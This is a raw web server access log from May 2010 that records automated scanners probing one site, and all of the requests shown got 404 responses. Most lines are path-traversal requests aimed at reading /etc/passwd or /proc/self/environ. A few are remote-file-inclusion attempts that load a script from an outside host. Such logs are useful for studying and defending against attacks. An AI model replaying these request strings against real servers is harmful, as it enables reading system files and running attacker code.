174.136.55.175 - - [08/May/2010:00:28:13 -0500] "GET /box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
174.136.55.175 - - [08/May/2010:00:28:13 -0500] "GET /logs/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.823"
94.23.9.179 - - [08/May/2010:00:28:15 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
94.23.9.179 - - [08/May/2010:00:28:16 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
94.23.9.179 - - [08/May/2010:00:28:16 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
78.46.47.78 - - [08/May/2010:00:28:38 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
78.46.47.78 - - [08/May/2010:00:28:38 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
78.46.47.78 - - [08/May/2010:00:28:39 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
174.136.55.175 - - [08/May/2010:00:29:09 -0500] "GET /box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
96.9.146.197 - - [08/May/2010:00:29:13 -0500] "GET /box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
82.96.90.170 - - [08/May/2010:00:29:25 -0500] "GET /box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.88.16.30 - - [08/May/2010:00:29:25 -0500] "GET /box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.826"
211.232.85.247 - - [08/May/2010:00:31:01 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.232.85.247 - - [08/May/2010:00:31:01 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.232.85.247 - - [08/May/2010:00:31:01 -0500] "GET /logs/access_log.1270598400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.16.214.18 - - [08/May/2010:00:31:16 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
69.16.214.18 - - [08/May/2010:00:31:16 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
69.16.214.18 - - [08/May/2010:00:31:16 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
91.121.30.72 - - [08/May/2010:00:31:59 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
94.23.9.179 - - [08/May/2010:00:32:02 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
91.121.161.129 - - [08/May/2010:00:32:03 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
85.19.150.100 - - [08/May/2010:00:32:05 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
89.149.242.197 - - [08/May/2010:00:32:08 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
89.149.242.197 - - [08/May/2010:00:32:08 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
89.149.242.197 - - [08/May/2010:00:32:08 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
89.149.242.197 - - [08/May/2010:00:32:08 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
204.188.235.66 - - [08/May/2010:00:32:10 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
78.46.47.78 - - [08/May/2010:00:32:10 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
195.228.152.176 - - [08/May/2010:00:32:13 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
195.56.172.136 - - [08/May/2010:00:32:14 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
208.78.41.116 - - [08/May/2010:00:32:20 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
208.43.48.82 - - [08/May/2010:00:32:22 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
174.121.67.233 - - [08/May/2010:00:32:23 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
82.96.90.170 - - [08/May/2010:00:32:24 -0500] "GET /logs/access_log.1272067200/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.805"
82.96.90.170 - - [08/May/2010:00:32:24 -0500] "GET /box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.96.90.170 - - [08/May/2010:00:32:24 -0500] "GET /logs/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.805"
89.108.70.32 - - [08/May/2010:00:32:33 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
207.45.186.2 - - [08/May/2010:00:32:33 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
69.16.214.18 - - [08/May/2010:00:32:38 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
69.16.214.18 - - [08/May/2010:00:32:38 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
69.16.214.18 - - [08/May/2010:00:32:39 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
69.16.214.18 - - [08/May/2010:00:32:39 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
206.214.219.125 - - [08/May/2010:00:32:49 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
91.121.30.72 - - [08/May/2010:00:32:57 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
91.121.30.72 - - [08/May/2010:00:32:58 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
91.121.30.72 - - [08/May/2010:00:32:58 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
207.45.186.2 - - [08/May/2010:00:33:05 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
207.45.186.2 - - [08/May/2010:00:33:05 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
207.45.186.2 - - [08/May/2010:00:33:05 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
89.108.70.32 - - [08/May/2010:00:33:29 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
89.108.70.32 - - [08/May/2010:00:33:29 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
89.108.70.32 - - [08/May/2010:00:33:29 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
195.228.152.176 - - [08/May/2010:00:33:34 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
195.228.152.176 - - [08/May/2010:00:33:34 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
195.228.152.176 - - [08/May/2010:00:33:34 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.19.150.100 - - [08/May/2010:00:33:56 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
85.19.150.100 - - [08/May/2010:00:33:57 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
85.19.150.100 - - [08/May/2010:00:33:57 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
118.129.170.48 - - [08/May/2010:00:34:03 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
118.129.170.48 - - [08/May/2010:00:34:04 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
118.129.170.48 - - [08/May/2010:00:34:04 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
174.136.55.175 - - [08/May/2010:00:34:26 -0500] "GET /logs/access_log.1272067200/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.823"
174.136.55.175 - - [08/May/2010:00:34:26 -0500] "GET /box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
174.136.55.175 - - [08/May/2010:00:34:26 -0500] "GET /logs/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.823"
120.50.40.133 - - [08/May/2010:00:34:40 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
120.50.40.133 - - [08/May/2010:00:34:40 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
91.121.30.72 - - [08/May/2010:00:34:40 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
120.50.40.133 - - [08/May/2010:00:34:40 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
120.50.40.133 - - [08/May/2010:00:34:40 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
91.121.30.72 - - [08/May/2010:00:34:41 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
80.88.16.30 - - [08/May/2010:00:34:41 -0500] "GET /logs/access_log.1272067200/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.826"
91.121.30.72 - - [08/May/2010:00:34:41 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.88.16.30 - - [08/May/2010:00:34:41 -0500] "GET /box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.826"
80.88.16.30 - - [08/May/2010:00:34:41 -0500] "GET /logs/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.826"
89.149.242.197 - - [08/May/2010:00:34:42 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.149.242.197 - - [08/May/2010:00:34:42 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
89.149.242.197 - - [08/May/2010:00:34:42 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
91.121.161.129 - - [08/May/2010:00:34:43 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
91.121.161.129 - - [08/May/2010:00:34:43 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
91.121.161.129 - - [08/May/2010:00:34:43 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
195.56.172.136 - - [08/May/2010:00:34:47 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
195.56.172.136 - - [08/May/2010:00:34:47 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
195.56.172.136 - - [08/May/2010:00:34:47 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
94.23.9.179 - - [08/May/2010:00:34:48 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.23.9.179 - - [08/May/2010:00:34:48 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
94.23.9.179 - - [08/May/2010:00:34:48 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
208.43.48.82 - - [08/May/2010:00:35:07 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
208.43.48.82 - - [08/May/2010:00:35:07 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
208.43.48.82 - - [08/May/2010:00:35:07 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
207.45.186.2 - - [08/May/2010:00:35:18 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
207.45.186.2 - - [08/May/2010:00:35:19 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
207.45.186.2 - - [08/May/2010:00:35:19 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
89.149.242.197 - - [08/May/2010:00:35:19 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
89.149.242.197 - - [08/May/2010:00:35:19 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
89.149.242.197 - - [08/May/2010:00:35:19 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
89.149.242.197 - - [08/May/2010:00:35:21 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
89.149.242.197 - - [08/May/2010:00:35:21 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
89.149.242.197 - - [08/May/2010:00:35:21 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
82.96.90.170 - - [08/May/2010:00:35:29 -0500] "GET /logs/access_log.1272067200/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.805"
82.96.90.170 - - [08/May/2010:00:35:30 -0500] "GET /box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.96.90.170 - - [08/May/2010:00:35:30 -0500] "GET /logs/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.805"
89.149.242.197 - - [08/May/2010:00:35:33 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
89.149.242.197 - - [08/May/2010:00:35:33 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
89.149.242.197 - - [08/May/2010:00:35:33 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.228.152.176 - - [08/May/2010:00:35:35 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
195.228.152.176 - - [08/May/2010:00:35:35 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
195.228.152.176 - - [08/May/2010:00:35:35 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
204.188.235.66 - - [08/May/2010:00:35:42 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
204.188.235.66 - - [08/May/2010:00:35:43 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
204.188.235.66 - - [08/May/2010:00:35:43 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
